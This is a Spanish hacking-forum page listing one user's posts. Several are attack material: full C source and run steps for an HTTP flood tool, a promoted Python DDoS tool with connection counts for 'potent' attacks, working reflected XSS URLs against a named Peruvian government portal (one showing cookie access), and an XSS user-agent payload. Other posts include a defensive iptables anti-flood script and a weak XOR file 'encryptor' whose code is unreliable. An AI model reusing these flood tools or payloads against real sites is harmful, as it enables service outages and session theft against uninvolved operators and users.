Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Temas - v4char

Páginas: [1]
1
Dudas y pedidos generales / Ayuda con cifrado
« en: Febrero 27, 2016, 11:48:48 pm »
He estado buscando y no encuentor una manera o algun programa que teniendo el hash y la pass te busque el cifrado.
¿A alguien se le ocurre algo?

Código: [Seleccionar]
c8b53ee8d330501d2c838b39ae21018ef5e8bd58 -> 123456

2
Hacking / v4Ddos [Herramienta]
« en: Febrero 11, 2016, 07:56:30 pm »
v4Ddos

v4Ddos es una herramienta para hacer denegacion de de servicio a webs, es decir que ataca la capa de aplicación, lo he estado probando y los resultados son muy buenos y por eso lo publico.


Para correrlo solo necesitamos python con el modulo requests

Código: [Seleccionar]
apt-get install python-requests
Código: [Seleccionar]
git clone https://github.com/v4char/v4Ddos.git
Código: [Seleccionar]
python v4Ddos.py http://web/path numero_de_conexiones_simultaneas

Ten en cuenta que con 5000 conexiones simultaneas ya es un numero elevado y con 6000 ya es un ataque potente y en algunos casos puede saturar tu red o tu procesador si es de gama baja.

En el repositorio de github puedes encontrar el codigo https://github.com/v4char/v4Ddos

3
Dudas y pedidos generales / [SOLUCIONADO] Duda receptor 433mhz
« en: Enero 05, 2016, 03:56:38 pm »
Bueno lo primero he de decir que estoy muy verde en este tema.
Pero vamos a lo importante querría conectar este modulo (el de abajo)
a un usb directamente, es decir los pines que den a los del usb, que igual es una locura


es decir el de tierra con el de tierra del usb el de alimentacion lo mismo, he mirado los voltajes y el aperaje y esta bien, pero a la hora de los datos estoy muy perdido en como ponerlos o si necesito que reconozca el usb y como leer los datos.

Se agracede cualquier ayuda.

4
Dudas y pedidos generales / [PHP] Ayuda con comprobación de usuario
« en: Diciembre 24, 2015, 11:30:04 pm »
hola queria hacer una comprobacion para un usuario para que no contenga caracteres no permitidos que solo permita letras, numeros y guiones bajos pero no he conseguido hacer que funcione ¿Alguna idea?

he probado con esto pero nada
Código: (php) [Seleccionar]
if(preg_match("/^[a-zA-Z0-9]+$/", $_POST['user']))
{

} else
{
   $error = "El usuario solo puede contener letras, números y guiones bajos";
}

5
Dudas y pedidos generales / Biblioteca comprimida
« en: Diciembre 12, 2015, 01:59:47 pm »
Hay alguna manera de descargar todo la biblioteca de undec0de un zip con todo comprimido si hay alguna forma de descargar todo puedo subirlo yo luego a mega comprimido

6
Hacking ShowOff / Hacking en User agent
« en: Noviembre 19, 2015, 08:37:26 pm »
Hoy traigo una tecnica muy bonita (como el pescado) ;D

vamos a google y buscamos check my user agent y entramos en la primera  (se supone que es la mejor) http://mybrowserinfo.com/modificamos nuestro user agent ponemos ponemos codigo html y magia tienes un XSS y seguro que un sqli aunque no quiero dar ideas ;)


yo puse esto en el user agent
Código: [Seleccionar]
"'/>;.>//<h1>v4char</h1><script>alert("hola");</script>
pero puedes probar con sqli

ooooo teneis mi ip.

7
Hacking ShowOff / [XSS] Peru Gob
« en: Noviembre 19, 2015, 02:13:31 pm »
Hola, hoy traigo un XSS en la web del gobierno de peru la vulnerabilidad ya esta reportada por mi de hace mucho pero como no hacen caso...

Bueno el tema fue que me meti en la web en busca de un fallo asi rapido y encontre un xss en el portal de transparencia solo probe XSS pero estoy seguro que puede tener otros como SQLi aunque yo no he probado ni incito a hacerlo bueno es un XSS muy simple no tiene filtros ni nada a si que permite ejecutar javascript lo que puede permitir a un atacante robar la cookie del administrado del sitio y hacer cosas malas aquí dejo un video subido por mí


y ahora unos pequeños ejemplos de lo que puedes hacer

Alert
Código: [Seleccionar]
http://www.peru.gob.pe/transparencia/pep_transparencia_osce_exoneraciones_frame.asp?id_entidad=1%27%22;/%3E%3Cscript%3Ealert%28%22v4char%22%29;%3C/script%3E&id_tema=34


Cookies
Código: [Seleccionar]
http://www.peru.gob.pe/transparencia/pep_transparencia_osce_exoneraciones_frame.asp?id_entidad=1%27%22;/%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&id_tema=34

Body
Código: [Seleccionar]
http://www.peru.gob.pe/transparencia/pep_transparencia_osce_exoneraciones_frame.asp?id_entidad=1%27%22;/%3E%3Cscript%3E%20document.body.innerHTML%20=%20%22%3Ch1%3Ev4char%3C/h1%3E%22;%3C/script%3E&id_tema=34

y asi lo que quieras...

8
Debates y Reviews / 1GB = 1000MB
« en: Noviembre 17, 2015, 12:09:35 pm »
En este tema queria debatir la nueva implantación del sistema internacional, muy poca gente sabe que en el nuevo SI y 1GB es igual a 1000MB y 1MB es igual a 1000KB

https://es.wikipedia.org/wiki/Gigabyte
http://lasegundapuerta.com/index.php/informatica/linux-y-software-libre/847-tabla-de-equivalencias-del-bit-al-yobibyte.html


¿Que opinais sobre esto, es correcto o no?

9
Hacking / Tutorial Iptables (protegerse de denegación de servicio)
« en: Noviembre 16, 2015, 08:21:42 pm »
Aquí traigo un script a modo de tutorial de como protegerse de ataques de denegación de servicio

Código: (bash) [Seleccionar]
#!/bin/bash

# Limpiar reglas anteriores

iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT

##########################################################

# Se crea el archivo donde estan las ip bloqueadas se actualiza cada 200 segundos

iptables -A  listanegra -m recent --name lista_negra --rcheck --seconds 200 -j DROP

# Detener ataques de ICMP flood #

# Creamos la cadena icmp-flood
iptables -N icmp-flood

# Saltar a la cadena cuando el  ICMP  es detectado
iptables -A INPUT -p icmp -j icmp-flood

# Evitar si supera los 4 por segundo
iptables -A icmp-flood -m limit --limit 4/s --limit-burst 8 -m comment --comment "Limite de ICMP alcanzado" -j RETURN

# Registrar en el log cuando es muy alto
iptables -A icmp-flood -m limit --limit 6/h --limit-burst 1 -j LOG --log-prefix "Detectado ICMP flood "

# Mandar a lista negra la  IP por 200 segundos
iptables -A icmp-flood -m recent --name lista_negra --set -m comment --comment "Lista negra IP" -j DROP

##########################################################

# Detener el UDP flood #

# Creamos la cadena udp-flood
iptables -N udp-flood

# Saltar a la cadena cuando el UDP es detectado
iptables -A INPUT -p  udp -j udp-flood

# UDP maximo 10 por segundo limitar a 20
iptables -A udp-flood -m limit --limit 10/s --limit-burst 20 -m comment --comment "Limite UDP superado" -j RETURN

# Añadir al log si es muy alto
iptables -A udp-flood -m limit --limit 6/h --limit-burst 1 -j LOG --log-prefix "Detectado UDP flood "

# Mandar a lista negra la  IP por 200 segundos
iptables -A udp-flood -m recent --name lista_negra --set -m comment --comment "Lista negra IP" -j DROP

##########################################################

# Detener SYN flood #

# Más de lo mismo
iptables -N syn-flood
iptables -A INPUT -p tcp --syn -j syn-flood
iptables -A syn-flood -m limit --limit 2/s --limit-burst 6 -j RETURN
iptables -A syn-flood -m limit --limit 6/h --limit-burst 1 -j LOG --log-prefix "Detectado SYN flood "
iptables -A syn-flood -m recent --name lista_negra --set -j DROP
iptables -A INPUT -p tcp ! --syn -m state --state NEW -m comment --comment "Lista negra IP" -j DROP

##########################################################

# Paquetes mal formados #

iptables -N paquetes_malformados
iptables -A paquetes_malformados -m state --state INVALID -j DROP
iptables -A paquetes_malformados -p tcp --tcp-flags ALL ACK,RST,SYN,FIN -j DROP
iptables -A paquetes_malformados -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP
iptables -A paquetes_malformados -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
iptables -A paquetes_malformados -p tcp ! --syn -m state --state NEW -j DROP
iptables -A paquetes_malformados -f -j DROP
iptables -A paquetes_malformados -j RETURN

##########################################################

# Cortafuegos por v4char #

Si hay algun error o algún ataque que se me pase decirlo en los comentarios espero que sirva de ayuda para protejer routers, servidores y equipos.

Puedes ver la lista negra con el comando
Código: [Seleccionar]
cat /proc/net/xt_recent/lista_negra

10
C / C++ / Encriptador & Desencriptador
« en: Agosto 31, 2015, 11:09:04 pm »
Traigo un programa hecho en C que Encripta y Desencripta cualquier tipo de archivo con una clave alfanumérica.
Aquí la url de github donde hay un exe para la gente de windows (Para los que no saben compilar) https://github.com/v4char/Encriptador-Desencriptador



El código:
Código: (cpp) [Seleccionar]
#include <stdio.h>
#include <string.h>

int cifrado (int letra,long clave)
{
    letra = letra ^ clave;

    return letra;
}

int descifrado (int letra,long clave)
{
    letra = letra ^ clave;

    return letra;
}

int main()
{
    int var = 0,clave = 0,letra;
    FILE *lectura;
    FILE *escritura;
    char nombre_de_archivo[100];



    while (1)
    {
        printf("Encriptador/Desencriptador por v4char\n\n\n\n\n\n");
        printf("1-Cifrar\n2-Descifrar\n3-Salir\n\n\n\nIntroduce: ");
        fflush(stdout);
        scanf("%i", &var);
        if(var==3)
        {
            break;
        }

        printf("Nombre de archivo: ");
        fflush(stdout);
        scanf("%s", nombre_de_archivo);

        lectura = fopen(nombre_de_archivo, "r");

        if (lectura==NULL)
        {
            printf("El archivo no existe\n");
            return -1;
        }

        printf("Clave: ");
        fflush(stdout);
        scanf("%i", &clave);
        fflush(stdin);

        escritura = fopen("temporal", "w");

        if (var == 1)
        {

            while(!feof(lectura))
            {
                fputwc(cifrado(getc(lectura),clave), escritura);
            }

            fclose(lectura);
            fclose(escritura);

            remove(nombre_de_archivo);

            escritura = fopen("temporal", "r");
            lectura = fopen(nombre_de_archivo, "w+");

            while(!feof(escritura))
            {
                letra = getc(escritura);
                fputwc(letra, lectura);
            }


        } else if (var == 2)
        {
            while(!feof(lectura))
            {
                fputwc(cifrado(getc(lectura),clave), escritura);
            }

            fclose(lectura);
            fclose(escritura);

            remove(nombre_de_archivo);

            escritura = fopen("temporal", "r");
            lectura = fopen(nombre_de_archivo, "w+");

            while(!feof(escritura))
            {
                letra = getc(escritura);
                fputwc(letra, lectura);
            }

        } else
        {
            return -2;
        }
        fclose(lectura);
        fclose(escritura);
        remove("temporal");
        printf("\n\n\n\n\n\nTodo correcto\n\n\n\n\n\n");
        printf("==========================================================================\n");
    }

    return 0;
}

Un saludo, y no duden en comentar las dudas, sugerencias o fallos.

11
Hacking / Script para hacer HTTP Flood
« en: Julio 28, 2015, 11:09:57 am »
Como bien dice el título es un script para hacer ataques de flood por medio de peticiones http podeis encontrar el script en github https://github.com/v4char/HTTP-Flood tambien lo pegaré aquí pero por github lo ire actualizando.

Probadon en Kali y Freebsd

http-flood.c
Código: (cpp) [Seleccionar]
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

int main()
{
    char host[21],archivo[201],comando[651];
    int puerto,n_con,i,esperar;

    printf("IP: ");
    fflush(stdout);
    scanf("%s", host);

    printf("Puerto: ");
    fflush(stdout);
    scanf("%i", &puerto);

    printf("Archivo(en/img/index.php): ");
    fflush(stdout);
    scanf("%s", archivo);

    printf("Threads: ");
    fflush(stdout);
    scanf("%i", &n_con);

    printf("Delay en segundos: ");
    fflush(stdout);
    scanf("%i", &esperar);

    sprintf(comando, "echo \"GET /%s\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0\" | nc %s %i -r > NUL &", archivo, host, puerto);
    while (1)
    {
        i=0;
        for(i=0;i<n_con;i++)
        {
            fflush(stdout);
            system(comando);
            system("echo \"\" > NUL &");
            printf("=");
            system("rm -f NUL &");
        }
    printf("\n");
    sleep(esperar);
    }


    return 0;
}

Para descargalo
Código: [Seleccionar]
wget https://raw.githubusercontent.com/v4char/HTTP-Flood/master/http-flood.c
Lo primero es compilarlo
Código: [Seleccionar]
gcc http-flood.c -o http-flood
Ahora le damos permisos de ejecución (no suele ser necesario)
Código: [Seleccionar]
chmod +x http-flood
Y ejecutamos el programa
Código: [Seleccionar]
./http-flood
Ahora nos pedira una IP luego el puerto luego un archivo puede ser el index.html o index.php por ejemplo luego cuantos hilos y por ultimo el delay

En el delay se admiten numeros decimales como por ejemplo 0.5 ojo es un punto no una coma y si no quieres delay pon un 0

Si teneis alguna idea o problema decirmelo.

Fuente:https://foro.hackxcrack.net/hacking/script-para-hacer-http-flood/

Páginas: [1]